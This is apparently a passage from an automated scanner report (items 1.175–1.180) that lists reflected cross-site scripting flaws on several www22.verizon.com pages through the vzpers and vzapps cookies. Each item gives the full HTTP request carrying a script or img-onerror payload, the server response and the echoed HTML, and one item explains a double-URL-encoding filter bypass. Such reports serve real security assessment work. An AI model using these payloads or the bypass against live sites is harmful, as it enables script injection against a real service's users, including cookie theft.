<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXEB562'><SCRIPT>ALERT(1)</SCRIPT>82A1C55DD60 ' />
...[SNIP]...

1.175. http://www22.verizon.com/residential/homephone/ [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/homephone/

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 882c9<script>alert(1)</script>a8f36693d1f was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/homephone/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX882c9<script>alert(1)</script>a8f36693d1f; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 59966
Expires: Mon, 13 Dec 2010 00:54:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:54:24 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:54:24 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: BTagRequired=N; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:54:24 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:54:24 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:54:24 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX882C9<SCRIPT>ALERT(1)</SCRIPT>A8F36693D1F </DIV>
...[SNIP]...

1.176. http://www22.verizon.com/residential/homephone/ [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/homephone/

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 55a26'><script>alert(1)</script>51be17770e9 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/homephone/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX55a26'><script>alert(1)</script>51be17770e9; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 61484
Expires: Mon, 13 Dec 2010 00:54:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:54:21 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:54:21 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: BTagRequired=N; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:54:21 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:54:21 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:54:21 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX55A26'><SCRIPT>ALERT(1)</SCRIPT>51BE17770E9 ' />
...[SNIP]...

1.177. http://www22.verizon.com/residential/internet [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/internet

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fea07'><script>alert(1)</script>b98943dd7f8 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/internet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXfea07'><script>alert(1)</script>b98943dd7f8; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67128
Expires: Mon, 13 Dec 2010 01:00:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:00:57 GMT
Connection: close
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:57 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:57 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:57 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><title>
Veri
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXFEA07'><SCRIPT>ALERT(1)</SCRIPT>B98943DD7F8 ' />
...[SNIP]...

1.178. http://www22.verizon.com/residential/internet [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/internet

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 17d47<script>alert(1)</script>464b55e2a was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/internet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX17d47<script>alert(1)</script>464b55e2a; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67120
Expires: Mon, 13 Dec 2010 01:00:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:00:58 GMT
Connection: close
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:58 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:58 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><title>
Veri
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX17D47<SCRIPT>ALERT(1)</SCRIPT>464B55E2A </DIV>
...[SNIP]...

1.179. http://www22.verizon.com/residential/specialoffers/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/specialoffers/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6adc3%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e365dd94a7b9 was submitted in the vzapps cookie. This input was echoed as 6adc3"><img src=a onerror=alert(1)>365dd94a7b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the vzapps cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /residential/specialoffers/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX6adc3%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e365dd94a7b9; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Expires: Mon, 13 Dec 2010 00:59:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:59:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDCARDDBQC=NMELHINCBDOKFDIEKHNIBJEC; path=/
Content-Length: 126424



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>


<title>Verizon | Residential Specia
...[SNIP]...
<script type="text/javascript" src="/residential/specialoffers/zipcheck?st=TX6adc3"><img src=a onerror=alert(1)>365dd94a7b9">
...[SNIP]...

1.180. http://www22.verizon.com/residentialhelp/ [vzapps cookie] previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 788fd<script>alert(1)</script>db85b93448f was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/ HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX788fd<script>alert(1)</script>db85b93448f; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; vzpers=STATE=TX; canigetfios=Y; showpromo=N; vsrecentsearches=%26%2339%3b~~~~; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; BusinessUnit=residential; CMS_TimeZoneOffset=360; RVServiceLocation=TX; CP=null*; ContextInfo_State=TX; BTagRequired=N; refURL=http://www22.verizon.com/residential/bundles/overview#

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 174671
Expires: Mon, 13 Dec 2010 00:52:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:52:11 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Mon, 13-Dec-2010 00:57:11 GMT; path=/residentialhelp/; domain=verizon.com

<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong>, TX788fd<script>alert(1)</script>db85b93448f </span>
...[SNIP]...

Report generated by XSS.CX at Sun Dec 12 19:42:28 CST 2010.